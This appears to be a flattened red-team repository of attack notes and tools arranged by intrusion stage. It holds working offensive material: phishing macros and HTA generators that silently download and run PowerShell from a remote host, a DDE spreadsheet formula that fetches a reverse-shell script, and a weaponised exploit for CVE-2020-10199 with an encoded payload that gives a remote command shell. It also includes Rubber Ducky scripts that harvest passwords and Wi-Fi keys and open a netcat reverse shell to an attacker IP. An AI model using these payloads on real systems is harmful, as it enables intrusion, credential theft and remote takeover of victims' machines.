├── 1.-Initial Access ├── Exploit Public Applications │ ├── README.txt │ └── Rejetto.txt ├── External Remote Services │ ├── External Remote Services.txt │ └── README.txt └── Phishing │ ├── Attachments │ ├── HTA.txt │ ├── Macros.txt │ └── README.txt │ ├── Generators │ ├── HTA-Generator.py │ └── Macro-Generator.py │ ├── Links │ └── Frameworks.txt │ └── README.txt ├── 2.-Execution ├── Command and Scripting Interpreter.txt ├── Component Object Model (COM).txt ├── Dynamic Data Exchange (DDE).txt ├── Office Applications.txt ├── README.txt ├── Scheduled Tasks.txt └── User Execution.txt ├── 3.-Persistence ├── README.txt └── Tools.txt ├── 4.-Privilege Escalation ├── Create Process Token.txt ├── DLLSideloader.zip ├── PPID-Spoof.zip ├── PrintSpoofer.zip ├── README.txt ├── SharpUp.zip └── UACME.zip ├── CVEs ├── CVE-2020-0688 │ ├── Exploit.md │ └── cve-2020-0688.zip ├── CVE-2020-0796 │ ├── README.md │ └── cve-2020-0796-local.zip ├── CVE-2020-10199 │ ├── 1.png │ ├── CVE-2020-10199.py │ └── readme.md └── README.md ├── Misc └── Rubber Ducky │ ├── Credential Grabber.txt │ ├── Get WLAN Keys.txt │ ├── Netcat Reverse Payload.txt │ ├── README.md │ └── Rubber-Ducky-README.md ├── Payloads └── Generators │ ├── BAT-Generator.py │ ├── HTA-Generator.py │ ├── MSBuildXMLPayload.py │ ├── Macro-Generator.py │ ├── Padding.py │ └── README.md ├── README.md └── Tool Installer └── Tools-Kali-Installation.py /1.-Initial Access/Exploit Public Applications/README.txt: -------------------------------------------------------------------------------- 1 | An example on how public aaplications can be exploited and APT can gain Execution -------------------------------------------------------------------------------- /1.-Initial Access/Exploit Public Applications/Rejetto.txt: -------------------------------------------------------------------------------- 1 | Link: 2 | 3 | 
https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/initial-access/t1190-exploit-public-facing-applications/rejetto-http-file-server-hfs-2.3 -------------------------------------------------------------------------------- /1.-Initial Access/External Remote Services/External Remote Services.txt: -------------------------------------------------------------------------------- 1 | https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/initial-access/untitled -------------------------------------------------------------------------------- /1.-Initial Access/External Remote Services/README.txt: -------------------------------------------------------------------------------- 1 | An example on how Remote Services can be exploited and can help with gaining Initial Access to the Network -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Attachments/HTA.txt: -------------------------------------------------------------------------------- 1 | This file needs to be saved as an HTA file (.hta) 2 | This can be attached or sent as a link as well it will execute once the user allows it and will call a powershell code 3 | Copy and Paste the following code and save it. 4 | 5 | ############################################################################### 6 | 7 | 8 | 9 | 10 | 11 | Payload 12 | 17 | 22 | 23 | 24 |
25 | 26 |
27 | 28 | 29 | 30 | 31 | ############################################################################# -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Attachments/Macros.txt: -------------------------------------------------------------------------------- 1 | Office: 2 | 3 | Enable Developor Ribbon 4 | 5 | Then copy paste the following code onto a Word Doc and save it as a Macro-Enabled Document (.docm) 6 | When the file is opened the PowerShell Code will be executed 7 | 8 | ######################################################## 9 | 10 | Sub Auto_Open() 11 | Dim exec As String 12 | Dim payload As String 13 | exec = "powershell.exe -WindowStyle hidden -nologo -noprofile -c ""IEX ((New-Object Net.WebClient).DownloadString('http://10.0.2.20:8000/payload.ps1'))""" 14 | Shell (exec) 15 | End Sub 16 | Sub AutoOpen() 17 | Auto_Open 18 | End Sub 19 | Sub Workbook_Open() 20 | Auto_Open 21 | End Sub 22 | 23 | ######################################################## -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Attachments/README.txt: -------------------------------------------------------------------------------- 1 | Some samples of malware that can be attached to the Email sent to the Target -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Generators/HTA-Generator.py: -------------------------------------------------------------------------------- 1 | # /usr/bin/python3 env 2 | # A simple HTA Generator 3 | # This can be used to later Obfuscate 4 | # Simple POC does not BYpass AV 5 | print(""" 6 | _ _ _______ _____ _ 7 | | | | |__ __|/\ / ____| | | 8 | | |__| | | | / \ | | __ ___ _ __ ___ _ __ __ _| |_ ___ _ __ 9 | | __ | | | / /\ \ | | |_ |/ _ \ '_ \ / _ \ '__/ _` | __/ _ \| '__| 10 | | | | | | |/ ____ \ | |__| | __/ | | | __/ | | (_| | || (_) | | 11 | |_| |_| |_/_/ \_\ \_____|\___|_| 
|_|\___|_| \__,_|\__\___/|_| 12 | 13 | """) 14 | html_title = input ("Choose an HTML Title >>") 15 | app_name = input ("Choose App Name >>") 16 | payload_n = input ("Payload Name >>") 17 | print ("Example: http://example:80/Payload.ps1") 18 | URL = input("Enter Full URL with PS1 payload name >>") 19 | 20 | hta_payload = payload_n + ".hta" 21 | 22 | hta = "\n" 23 | hta += "\n" 24 | hta += "\n" 25 | hta += "\n" 26 | hta += "" + html_title + "\n" 27 | hta += "\n" 36 | hta += "\n" 45 | hta += "\n" 46 | hta += "\n" 47 | hta += "\n" 48 | hta += "\n" 49 | 50 | hf = open(hta_payload, 'w') 51 | hf.write(hta) 52 | hf.close() 53 | 54 | print ("File saved as: " + hta_payload) -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Generators/Macro-Generator.py: -------------------------------------------------------------------------------- 1 | # /usr/bin/python3 env 2 | # A simpe Macro Generator 3 | # Simple POC, this can be used with other tools to obfuscate 4 | # Will Bypass nothing 5 | 6 | print (""" 7 | __ __ _____ _ 8 | | \/ | / ____| | | 9 | | \ / | __ _ ___ _ __ ___ ______| | __ ___ _ __ ___ _ __ __ _| |_ ___ _ __ 10 | | |\/| |/ _` |/ __| '__/ _ \______| | |_ |/ _ \ '_ \ / _ \ '__/ _` | __/ _ \| '__| 11 | | | | | (_| | (__| | | (_) | | |__| | __/ | | | __/ | | (_| | || (_) | | 12 | |_| |_|\__,_|\___|_| \___/ \_____|\___|_| |_|\___|_| \__,_|\__\___/|_| 13 | 14 | 15 | """) 16 | 17 | macro_name = input ("Choose File name >>") 18 | print ("Example: http://example:80/Payload.ps1") 19 | url = input ("Enter Full URL payload with PS Filename included >>") 20 | 21 | macro_payload = macro_name + '.vbs' 22 | macro = "Sub Auto_Open()\n" 23 | macro += " Dim exec As String\n" 24 | macro += " Dim payload As String\n" 25 | macro += """ exec = "powershell.exe -WindowStyle hidden -nologo -noprofile -c ""IEX ((New-Object Net.WebClient).DownloadString""" 26 | macro += "('" 27 | macro += str(url) 28 | macro += "'))\"\"\"\n" 29 | macro += 
" Shell (exec)\n" 30 | macro += "End Sub\n" 31 | macro += "Sub AutoOpen()\n" 32 | macro += " Auto_Open\n" 33 | macro += "End Sub\n" 34 | macro += "Sub Workbook_Open()\n" 35 | macro += " Auto_Open\n" 36 | macro += "End Sub\n" 37 | 38 | macrof = open(macro_payload, 'w') 39 | macrof.write(macro) 40 | macrof.close() 41 | 42 | print ("File saved as: " + macro_name) 43 | -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/Links/Frameworks.txt: -------------------------------------------------------------------------------- 1 | This just requires you to install Setoolkit or Gophish 2 | 3 | Their proper githus are listed below: 4 | 5 | Setoolkit: 6 | 7 | https://github.com/trustedsec/social-engineer-toolkit 8 | 9 | GoPhish: 10 | 11 | https://github.com/gophish/gophish 12 | -------------------------------------------------------------------------------- /1.-Initial Access/Phishing/README.txt: -------------------------------------------------------------------------------- 1 | Generator Tools has been aded to this folder to create the various payloads for Intial Access. 
2 | 3 | FYI: These are very simple and known payloads (Will get caught) -------------------------------------------------------------------------------- /2.-Execution/Command and Scripting Interpreter.txt: -------------------------------------------------------------------------------- 1 | Please refer to the URL to view the various available 2 | 3 | https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/execution/t1059-command-and-scripting-interpreter -------------------------------------------------------------------------------- /2.-Execution/Component Object Model (COM).txt: -------------------------------------------------------------------------------- 1 | The blogs and code will be added here so you can check them out 2 | 3 | Blogs: 4 | 5 | https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ 6 | https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html 7 | 8 | Code: 9 | 10 | Get-CimInstance -ClassName Win32_COMApplication 11 | Get-CimInstance -ClassName Win32_COMApplication -Property * |Select-String Shell Windows 12 | $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-A442-00A0C90A8F39') 13 | $obj = [System.Activator]::CreateInstance($com) 14 | $obj 15 | 16 | $item.Document.Application.ShellExecute('calc.exe') -------------------------------------------------------------------------------- /2.-Execution/Dynamic Data Exchange (DDE).txt: -------------------------------------------------------------------------------- 1 | The Command utilized on the Excel Example to execute our payload: 2 | 3 | =cmd|'/c powershell.exe -w hidden IEX (New-Object Net.WebClient).DownloadString(\"http://10.0.2.8:8080/Invoke-PowerShellTcp.ps1\");'!_xlbgnm.A1 4 | 5 | #### 6 | Note 7 | #### 8 | 9 | The last two chracters point to the cell of the spreadsheet make sure these match when adding the command -------------------------------------------------------------------------------- /2.-Execution/Office Applications.txt: 
I used the same approach as with a Macro; it is intended for another user who probably needs it on another workstation, and this code can get executed
Most of this category just contains methods on how to achieve Persistence; there is no special tool to achieve this
NULL, NULL, &startupInfo, &processInformation); 26 | 27 | std::cin >> a; 28 | return 0; 29 | } 30 | 31 | ###################################################################################### -------------------------------------------------------------------------------- /4.-Privilege Escalation/DLLSideloader.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/4.-Privilege Escalation/DLLSideloader.zip -------------------------------------------------------------------------------- /4.-Privilege Escalation/PPID-Spoof.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/4.-Privilege Escalation/PPID-Spoof.zip -------------------------------------------------------------------------------- /4.-Privilege Escalation/PrintSpoofer.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/4.-Privilege Escalation/PrintSpoofer.zip -------------------------------------------------------------------------------- /4.-Privilege Escalation/README.txt: -------------------------------------------------------------------------------- 1 | This category contains a few tools that can help achieve Privilege Escalation, enumerate this category or achive this with certain tools 2 | there is nothing specific to this as their many methods to reach this goal. 
3 | -------------------------------------------------------------------------------- /4.-Privilege Escalation/SharpUp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/4.-Privilege Escalation/SharpUp.zip -------------------------------------------------------------------------------- /4.-Privilege Escalation/UACME.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/4.-Privilege Escalation/UACME.zip -------------------------------------------------------------------------------- /CVEs/CVE-2020-0688/Exploit.md: -------------------------------------------------------------------------------- 1 | Microsoft Exchange Remote Code Execution. 2 | -------------------------------------------------------------------------------- /CVEs/CVE-2020-0688/cve-2020-0688.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/CVEs/CVE-2020-0688/cve-2020-0688.zip -------------------------------------------------------------------------------- /CVEs/CVE-2020-0796/README.md: -------------------------------------------------------------------------------- 1 | A local privilege Escalation 2 | -------------------------------------------------------------------------------- /CVEs/CVE-2020-0796/cve-2020-0796-local.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/CVEs/CVE-2020-0796/cve-2020-0796-local.zip -------------------------------------------------------------------------------- /CVEs/CVE-2020-10199/1.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/Red-Team-Notes/ece7427ca8c4923540159b3efd0db0b9a72b8e99/CVEs/CVE-2020-10199/1.png -------------------------------------------------------------------------------- /CVEs/CVE-2020-10199/CVE-2020-10199.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import sys 4 | from cmd import Cmd 5 | import os 6 | import base64 7 | 8 | headers ={ 9 | 'X-Requested-With': 'XMLHttpRequest' 10 | } 11 | 12 | class Prompt(Cmd): 13 | prompt = 'Shell>' 14 | intro = 'Usage: cmd \n' 15 | def __init(self): 16 | Cmd.__init__(self) 17 | def help_cmd(self): 18 | print("Execute a command on the server.\nUsage: cmd \n") 19 | def help_exit(self): 20 | print("Exits") 21 | def do_exit(self,arg): 22 | print("Exits") 23 | return True 24 | def do_cmd(self,command): 25 | if(command != ""): 26 | ExecuteCommand(command) 27 | else: 28 | print("Specify a command") 29 | 30 | def ExecuteCommand(command): 31 | url = sys.argv[1] 32 | username = base64.b64encode(sys.argv[2]) 33 | password = base64.b64encode(sys.argv[3]) 34 | req = requests.session() 35 | data = {'username':username,'password':password} 36 | log_req = req.post(url+"/service/rapture/session",data=data,headers=headers) 37 | data2 = '''{ 38 | "name": "internal", 39 | "online": "true", 40 | "storage": { 41 | "blobStoreName": "default", 42 | "strictContentTypeValidation": "true" 43 | }, 44 | "group": { 45 | "memberNames": ["${' 
'.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$ea$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sf
u$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4
$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()}"] 46 | } 47 | }''' 48 | proxies = {'http': 'http://127.0.0.1:8080'} 49 | 50 | log_req2 = req.post(url+"/service/rest/beta/repositories/go/group",data=data2,headers={'404':command,'Content-Type': 'application/json'},proxies=proxies) 51 | print log_req2.text 52 | 53 | 54 | 55 | if __name__ == '__main__': 56 | if len(sys.argv)!=4: 57 | print len(sys.argv) 58 | sys.exit("\n [+] Usage: python %s http://127.0.0.1:8080 username password" % sys.argv[0]) 59 | os.system('cls') 60 | Prompt = Prompt() 61 | Prompt.cmdloop() 62 | 63 | -------------------------------------------------------------------------------- /CVEs/CVE-2020-10199/readme.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-10199 2 | 3 | 回显版本 随手写的未测试bug 4 | 5 | ``` 6 | Usage: python http://127.0.0.1:8080 username password 7 | 8 | ``` 9 | 10 | ![](./1.png) 11 | 12 | 参考:https://www.cnblogs.com/magic-zero/p/12641068.html -------------------------------------------------------------------------------- /CVEs/README.md: -------------------------------------------------------------------------------- 1 | A compilation of CVE exploits, I will try and do as best as possible to compile them and have them already weaponized 2 | so they should be able to just be executed on the go. Will try to keep this as updated as possible. As not all CVE have a 3 | public PoC Code. 
4 | -------------------------------------------------------------------------------- /Misc/Rubber Ducky/Credential Grabber.txt: -------------------------------------------------------------------------------- 1 | REM Title: Credential Grabber 2 | REM Author: David Garcia [dmcxblue] 3 | REM Version: 1.0 4 | REM Description: 5 | DELAY 200 6 | REM --> Minimize all windows 7 | GUI d 8 | DELAY 500 9 | REM --> Run powershell 10 | GUI r 11 | STRING powershell 12 | ENTER 13 | DELAY 1000 14 | ALT y 15 | DELAY 500 16 | REM --> Open powershell and create a folder called ducky to save all the loot 17 | STRING mkdir C:\Users\[user]\AppData\Local\Temp\ducky 18 | ENTER 19 | DELAY 150 20 | REM --> Move into the new directory 21 | STRING cd C:\Users\[user]\AppData\Local\Temp\ducky 22 | rem --> Start looting 23 | STRING systeminfo.exe > systeminfo.txt 24 | ENTER 25 | DELAY 200 26 | REM --> This will find any missing patches that will help on Local Priviledge or Remote Exploits 27 | STRING wmic qfe get Caption,Description,HotFixID,InstalledOn > patches.txt 28 | REM --> Passwords 29 | ENTER 30 | DELAY 250 31 | REM --> Will look for passwords in TXT files 32 | STRING findstr /si password *.txt > passwords.txt 33 | ENTER 34 | DELAY 100 35 | REM --> Will look for passwords in XML files 36 | STRING findstr /si password *.xml > passwords-xml.txt 37 | ENTER 38 | DELAY 100 39 | REM --> Will look for passwords in INI files 40 | STRING findstr /si password *.ini > passwords-ini.txt 41 | ENTER 42 | DELAY 250 43 | REM --> Looks for all passwords in all files 44 | STRING findstr /spin "password" *.* > passwords-all.txt 45 | ENTER 46 | DELAY 100 47 | REM --> Now to look for passwords in registry 48 | ENTER 49 | DELAY 100 50 | STRING reg query HKLM /f password /t REG_SZ /s > HKLM_passqords.txt 51 | ENTER 52 | DELAY 250 53 | STRING reg query HKCU /f password /t REG_SZ /s > HKCU_passwords.txt 54 | ENTER 55 | DELAY 500 56 | REM --> Open Folder to grab loot!! 
57 | ENTER 58 | STRING Invoke-Item [PATH to ducky folder in TEMP] 59 | ENTER 60 | DELAY 1000 61 | -------------------------------------------------------------------------------- /Misc/Rubber Ducky/Get WLAN Keys.txt: -------------------------------------------------------------------------------- 1 | REM Title: WLAN Keys 2 | REM Author: David Garcia [dmcxblue] 3 | REM Version: 1 4 | REM Description: A simple script that runs cmd and uses netsh to grab clear text WLAN Keys 5 | DELAY 200 6 | REM --> Starts cmd 7 | WINDOWS d 8 | DELAY 500 9 | STRING cmd 10 | ENTER 11 | DELAY 1000 12 | STRING netsh wlan show profiles 13 | ENTER 14 | DELAY 500 15 | REM --> This will show the profiles of all WiFi connected previously and Currently 16 | REM --> Edit to Wifi Name you need the key from without '[]' 17 | ENTER 18 | DELAY 500 19 | STRING netsh wlan show profile [WIFI-NAME] key=clear 20 | ENTER 21 | DELAY 500 22 | REM --> Uncomment [REM] and this will save to the TEMP Folder 23 | REM --> If WiFi has spaces on it's name use double-quotes "[Wifi]" 24 | REM STRING netsh wlan show profile "[WIFI-NAME]" key=clear > %TEMP%\keys.txt 25 | REM DELAY 100 26 | REM ENTER 27 | -------------------------------------------------------------------------------- /Misc/Rubber Ducky/Netcat Reverse Payload.txt: -------------------------------------------------------------------------------- 1 | REM Title: Netcat Reverse Shell 2 | REM Author: David Garcia [dmcxblue] 3 | REM Version: 1.1 4 | REM Description: 5 | DELAY 200 6 | REM --> Minimize all windows 7 | WINDOWS d 8 | DELAY 500 9 | REM --> Start powershell here 10 | GUI r 11 | DELAY 600 12 | STRING powershell Start-Process powershell -Verb RunAs 13 | ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 500 17 | REM --> Downloads NetCat and Enables TLS just in case of TLS errors 18 | DELAY 500 19 | STRING [Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls" 20 | ENTER 21 | DELAY 500 22 | STRING Invoke-WebRequest 
"https://github.com/rahuldottech/netcat-for-windows/releases/download/1.12/nc64.exe" -OutFile "%TEMP%\nc.exe" 23 | ENTER 24 | DELAY 500 25 | REM --> Save's to the TEMP folder 26 | STRING cd %TEMP% 27 | STRING .\nc.exe [ATTACKER IP] 4444 -e cmd.exe 28 | ENTER 29 | REM --> Minimize windows again so Terminal doesnt just stay in front of the Screen 30 | DELAY 500 31 | WINDOWS d 32 | DELAY 500 33 | ENTER 34 | -------------------------------------------------------------------------------- /Misc/Rubber Ducky/README.md: -------------------------------------------------------------------------------- 1 | These scripts are basic in the use of powershell, no obfuscation or crazy bypass techniques they are simple POC 2 | -------------------------------------------------------------------------------- /Misc/Rubber Ducky/Rubber-Ducky-README.md: -------------------------------------------------------------------------------- 1 | These scripts are mean't for the Rubber Ducky Tool from Hak5, it should be very simple to understand and the majority use PowerShell 2 | for executing, downloading, reading, etc, etc. Should switch to other languages or simply use cmd, but for now use the simplicity 3 | and easyness of PowerShell. SHOULD ADD MORE LATER. 
4 | -------------------------------------------------------------------------------- /Payloads/Generators/BAT-Generator.py: -------------------------------------------------------------------------------- 1 | # This can probably be used later to obfuscate 2 | # SImple POC does not Bypass NADA 3 | 4 | print(""" 5 | __________ ________________ 6 | \______ \ / _ \__ ___/ 7 | | | _/ / /_\ \| | 8 | | | \/ | \ | 9 | |______ /\____|__ /____| 10 | \/ \/ 11 | ________ __ 12 | / _____/ ____ ____ ________________ _/ |_ ___________ 13 | / \ ____/ __ \ / \_/ __ \_ __ \__ \\ __\/ _ \_ __ \ 14 | \ \_\ \ ___/| | \ ___/| | \// __ \| | ( <_> ) | \/ 15 | \______ /\___ >___| /\___ >__| (____ /__| \____/|__| 16 | """) 17 | 18 | bat_n = input ("File Name >> ") 19 | 20 | bat_payload = bat_n + ".bat" 21 | 22 | bat = "@echo OFF\n" 23 | bat +="C:\\Windows\\System32\\cmd.exe" 24 | 25 | batf = open(bat_payload, 'w') 26 | batf.write(bat) 27 | batf.close() 28 | 29 | print("File saved as: " + bat_payload) 30 | 31 | -------------------------------------------------------------------------------- /Payloads/Generators/HTA-Generator.py: -------------------------------------------------------------------------------- 1 | # /usr/bin/python3 env 2 | # A simple HTA Generator 3 | # This can be used to later Obfuscate 4 | # Simple POC does not BYpass AV 5 | print(""" 6 | _ _ _______ _____ _ 7 | | | | |__ __|/\ / ____| | | 8 | | |__| | | | / \ | | __ ___ _ __ ___ _ __ __ _| |_ ___ _ __ 9 | | __ | | | / /\ \ | | |_ |/ _ \ '_ \ / _ \ '__/ _` | __/ _ \| '__| 10 | | | | | | |/ ____ \ | |__| | __/ | | | __/ | | (_| | || (_) | | 11 | |_| |_| |_/_/ \_\ \_____|\___|_| |_|\___|_| \__,_|\__\___/|_| 12 | 13 | """) 14 | html_title = input ("Choose an HTML Title >>") 15 | app_name = input ("Choose App Name >>") 16 | payload_n = input ("Payload Name >>") 17 | print ("Example: http://example:80/Payload.ps1") 18 | URL = input("Enter Full URL with PS1 payload name >>") 19 | 20 | hta_payload = payload_n + ".hta" 21 | 22 | 
